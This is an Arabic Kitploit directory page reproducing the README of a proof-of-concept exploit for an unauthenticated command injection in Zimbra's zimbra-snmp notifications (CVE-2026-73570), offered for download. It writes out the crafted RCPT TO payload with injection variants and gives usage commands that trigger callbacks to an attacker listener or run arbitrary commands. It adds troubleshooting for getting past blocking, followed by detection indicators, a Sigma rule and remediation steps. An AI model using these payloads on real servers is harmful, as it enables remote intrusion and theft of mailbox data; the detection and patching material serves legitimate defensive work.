Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/hainhc/cve-2026-73570
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالاستجابة للحوادثأمان البريد الإلكتروني
GitHubhainhc/cve-2026-73570

CVE-2026-73570

إثبات مفهوم للاستغلال لـ CVE-2026-73570، وهو حقن أوامر نظام التشغيل دون مصادقة في Zimbra Collaboration Suite عبر حقن سجل zimbra-snmp، مع إرشادات الكشف.

عرض المستودع
منذ 18س 28دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-73570 — Zimbra zimbra-snmp حقن أوامر نظام التشغيل دون مصادقة PoC

إثبات مفهوم استغلال لـ CVE-2026-73570، وهو حقن أوامر نظام التشغيل دون مصادقة (CWE-78، CVSS 8.9) في Zimbra Collaboration Suite < 10.1.20 عند تثبيت حزمة zimbra-snmp وتفعيل إشعارات SNMP.

إخلاء المسؤولية: هذا الـ PoC مخصص فقط لاختبارات الأمان المصرّح بها، والبحث الدفاعي، والتحقق من أنظمتك الخاصة. لا تستخدمه ضد أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره.

آلية الثغرة

تستخدم ميزة إشعارات SNMP في Zimbra أداة swatchdog لمراقبة /var/log/zimbra.log بحثًا عن أحداث الخدمة. عندما يطابق سطر سجل نمط المراقبة الخاص بها، يتم إدراج النص المطابق في أمر shell الذي يرسل إشعار SNMP — دون تعقيم.

سلسلة الهجوم:

root@kitploit:~
1. Attacker sends an SMTP session with a crafted RCPT TO address:

   RCPT TO:<"x: Service status change: localhost $(CMD)
            changed from stopped to running"@cve.invalid>

   The local part is an RFC 5321 quoted-string, so Postfix accepts the
   address syntax (spaces, colons, $(...) included).

2. Postfix rejects the recipient (relay denied / user unknown / sender
   restriction) and writes the FULL to=<...> string, quotes stripped, into
   /var/log/zimbra.log:

   NOQUEUE: reject: RCPT from unknown[x.x.x.x]: ... to=<x: Service status
   change: localhost $(CMD) changed from stopped to [email protected]> ...

3. swatchdog (zimbra-snmp) periodically scans the log and matches its
   watchfor pattern "Service status change ... changed from ... to ...".

4. The matched text is interpolated into the SNMP notification shell command
   -> $(CMD) is evaluated -> command execution as the `zimbra` user.

المتطلبات

يجب أن يستوفي الهدف جميع ما يلي:

  • Zimbra Collaboration < 10.1.20
  • حزمة zimbra-snmp مثبتة
  • إشعارات SNMP مفعّلة (zmlocalconfig | grep -i snmp_notify)

جانب المهاجم: Python 3 (المكتبة القياسية فقط، بدون تبعيات).

الاستخدام

root@kitploit:~
# 1. Verify RCE via out-of-band DNS callback (interactsh / Burp Collaborator):
python3 poc_cve_2026_73570.py -t mail.target.com --oob abc123.oast.site

# 2. Verify RCE via HTTP callback to your listener:
python3 poc_cve_2026_73570.py -t mail.target.com --oob http://10.0.0.5:8884/cb

# 3. Drop a marker file on the host (check manually on the server afterwards):
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "touch /tmp/CVE-2026-73570_pwned"

# 4. Fingerprint only (no payload sent):
python3 poc_cve_2026_73570.py -t mail.target.com --check-only

# Debug: print the full SMTP transcript
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "id" --debug

الخيارات:

العلمالوصف
-t, --targetعنوان IP/اسم مضيف SMTP الخاص بـ Zimbra الهدف (مطلوب)
-p, --portمنفذ SMTP (الافتراضي: 25)
--tlsاستخدام STARTTLS (مثل المنفذ 587)
--oobنطاق DNS خارج النطاق أو رابط استدعاء HTTP (موصى به)
--cmdأمر عشوائي بدلاً من استدعاء OOB
--fake-hostاسم المضيف داخل سلسلة Service status change المزيفة (الافتراضي: localhost)
--check-onlyبصمة فقط، دون إرسال أي حمولات
--delayالتأخير بين عمليات الإرسال بالثواني (الافتراضي: 1.0)
--debugطباعة نص SMTP الكامل

التحقق

يرسل السكربت كل أمر في عدة صيغ حقن ($(...)، علامات الاقتباس الخلفية، ;cmd;#، $({IFS}...)). لكل صيغة، راقب رمز استجابة RCPT:

استجابة RCPTالمعنى
250، 450، 454 Relay access denied، 550 5.1.1 User unknownتم قبول صيغة العنوان — سطر الرفض الذي يحتوي على سلسلة to=<...> الكاملة أصبح الآن في السجل. تم زرع الحمولة.
501 5.1.3 Bad recipient address syntaxرفض Postfix العنوان في وقت التحليل — لم يتم تسجيل أي شيء مفيد. يعيد السكربت المحاولة تلقائيًا بصيغة احتياطية بدون علامات اقتباس.

ثم أكّد على الخادم (إذا كان لديك صلاحية الوصول):

root@kitploit:~
# The injected line must be present:
grep 'Service status change' /var/log/zimbra.log | tail
# Expected: ... to=<x: Service status change: localhost $(...) changed from stopped to [email protected]> ...

# Wait 1-5 minutes (swatchdog scans the log periodically — execution is NOT real-time),
# then check for the effect:
ls -la /tmp/                    # if you used --cmd
# or watch your OOB listener for the callback

إذا كان سطر السجل موجودًا لكن الأمر لا يُنفَّذ أبدًا، فإن الشروط المسبقة المتبقية تكون على جانب swatchdog: تحقق من أن العملية قيد التشغيل (ps aux | grep swatch) وأن إعداداتها تراقب فعلاً نمط Service status change.

سياق التنفيذ: تُنفَّذ الأوامر باسم مستخدم zimbra (وليس root).

استكشاف الأخطاء وإصلاحها

  • لا توجد أسطر سجل على الإطلاق: من المحتمل أن عنوان IP المصدر الخاص بك محظور (fail2ban بعد محاولات مشوهة متكررة، أو جدار حماية). تحقق من fail2ban-client status، وiptables -L -n | grep <your_ip>، وتأكد من وصول الحزم إلى Postfix باستخدام tcpdump -i any port 25 and host <your_ip> -nn -A.
  • بحث grep ضيق جدًا: يتم تسجيل العناوين المشوهة كـ warning: Illegal address syntax ... in RCPT command: ... بدلاً من سطر NOQUEUE: reject. ابحث باستخدام عنوان IP الخاص بالمهاجم بدلاً من ذلك.
  • تأخر التنفيذ: يستطلع swatchdog السجل على دورة — امنح 1–5 دقائق قبل استنتاج الفشل.

الكشف (للمدافعين)

المؤشرات الرئيسية للاستغلال الناجح:

  1. أثر السجل (محاولة): to=<*: Service status change: *$(...)* داخل سطر رفض Postfix في /var/log/zimbra.log — إيجابيات كاذبة معدومة تقريبًا، لأن نص Service status change لا يظهر بشكل مشروع أبدًا داخل عنوان to=<>.
  2. شجرة العمليات (دقة عالية): أي shell أو مفسر أوامر (sh، bash، curl، wget، nc، python، perl) يُنشأ كعملية فرعية لـ swatchdog / swatch.
  3. ما بعد الاستغلال: ملفات .jsp/.jspx جديدة تحت /opt/zimbra/jetty/webapps/ أو /opt/zimbra/jetty_base/webapps/، ملفات غير متوقعة في /tmp/، إدخالات cron جديدة أو مفاتيح SSH لمستخدم zimbra، واتصالات صادرة من خادم البريد لا تتوافق مع تدفق البريد الطبيعي.

مثال قاعدة Sigma (مرحلة المحاولة):

root@kitploit:~
title: Zimbra SNMP Notification Log Injection Attempt - CVE-2026-73570
logsource:
  product: linux
  service: postfix
detection:
  sel:
    - 'to=<*: Service status change: *$(*'
    - 'to=<*: Service status change: *`*'
  condition: sel
level: high
tags:
  - attack.initial-access
  - attack.t1190
  - cve.2026.73570

المعالجة

  • قم بترقية Zimbra Collaboration إلى 10.1.20 أو أحدث.
  • إذا كان الترقية الفورية مستحيلة: عطّل إشعارات SNMP وفكّر في إيقاف/إزالة حزمة zimbra-snmp حتى يتم الترقيع.
  • هذه الثغرة مدرجة في CISA KEV مع استغلال نشط مؤكد — ابحث في السجلات لمدة لا تقل عن 30 يومًا على أي نظام كان عرضة للثغرة سابقًا، وتعامل مع أي اختراق مؤكد على أنه تعرض كامل لبيانات صندوق البريد.

المراجع

  • Zimbra Security Advisories (vendor): https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
  • Zimbra 10.1.20 patch release (fix): https://blog.zimbra.com/2026/07/patch-release-update-zimbra-10-1-20/
  • NVD — CVE-2026-73570: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
  • CISA Known Exploited Vulnerabilities Catalog (added 2026-08-21): https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=CVE-2026-73570
  • CISA alert — "CISA Adds One Known Exploited Vulnerability to Catalog": https://www.cisa.gov/news-events/alerts/2026/08/21/cisa-adds-one-known-exploited-vulnerability-catalog
  • CERT Polska advisory 145/2026 (active exploitation + IoC guidance, 2026-08-17): https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
  • BleepingComputer — "Critical Zimbra RCE flaw now actively exploited in attacks": https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-now-actively-exploited-in-attacks/
  • Help Net Security — "Unpatched Zimbra servers are falling to CVE-2026-73570 attacks": https://www.helpnetsecurity.com/2026/08/25/zimbra-cve-2026-73570-compromised/
تنزيل الأداة